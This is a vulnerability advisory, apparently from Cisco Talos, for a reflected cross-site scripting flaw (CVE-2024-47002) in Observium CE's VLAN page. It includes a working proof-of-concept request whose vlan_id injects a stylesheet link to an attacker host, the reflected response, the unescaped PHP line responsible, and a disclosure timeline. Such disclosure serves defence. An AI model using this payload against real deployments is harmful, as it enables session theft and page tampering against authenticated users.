CVE-2024-47002
A html code injection vulnerability exists in the vlan management part of Observium CE 24.4.13528. A specially crafted HTTP request can lead to an arbitrary html code. An authenticated user would need to click a malicious link provided by the attacker.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Observium CE 24.4.13528
Observium - https://www.observium.org/
8.7 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
Observium is a web-based network monitoring platform designed for network performance monitoring, infrastructure health management, and alerting. It provides automatic discovery of network devices, and supports a wide range of hardware and software platforms, including routers, switches, servers, and applications.
A reflected cross-site scripting vulnerability exists in vlan functionality where setting a proper value of vlan_id parameter an attacker is able to inject an arbitrary html code into web page.
To trigger this vulnerability an attacker needs to force victim’s browsers to send the following http request:
Decoded url
http://192.168.0.40/vlan/?vlan_id=<LINK REL="stylesheet" HREF="http://192.168.0.140:8000/very_evil.css">
Request
GET /vlan/?vlan_id=%3CLINK%20REL%3d%22stylesheet%22%20HREF%3d%22http%3a%2f%2f192.168.0.140%3a8000%2fvery_evil.css%22%3E HTTP/1.1
Host: 192.168.0.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wmeditor=0%3A0%3A0; OBSID=r6vhgucaevg38nhhv05gl94ddg; observium_screen_ratio=1; observium_screen_resolution=2560x1440; screen_scheme=light
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Response
HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:47:28 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 34024
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<table class="table table-hover table-striped vertical-align">
<tbody>
<tr class="up">
<td class="state-marker"></td>
<td style="padding: 10px 14px;"><span style="font-size: 20px; color: #193d7f;">VLAN <LINK REL="stylesheet" HREF="http://192.168.0.140:8000/very_evil.css"></span>
</td>
Vulnerable code is located in the following place: html/pages/vlan.inc.php
<table class="table table-hover table-striped vertical-align">
<tbody>
<tr class="up">
<td class="state-marker"></td>
<td style="padding: 10px 14px;"><span style="font-size: 20px; color: #193d7f;">VLAN ' . $vars['vlan_id'] . '</span>
</td>
<td>
2024-10-23 - Initial Vendor Contact
2024-10-23 - Vendor Disclosure
2024-12-24 - Vendor Patch Release
2025-01-15 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.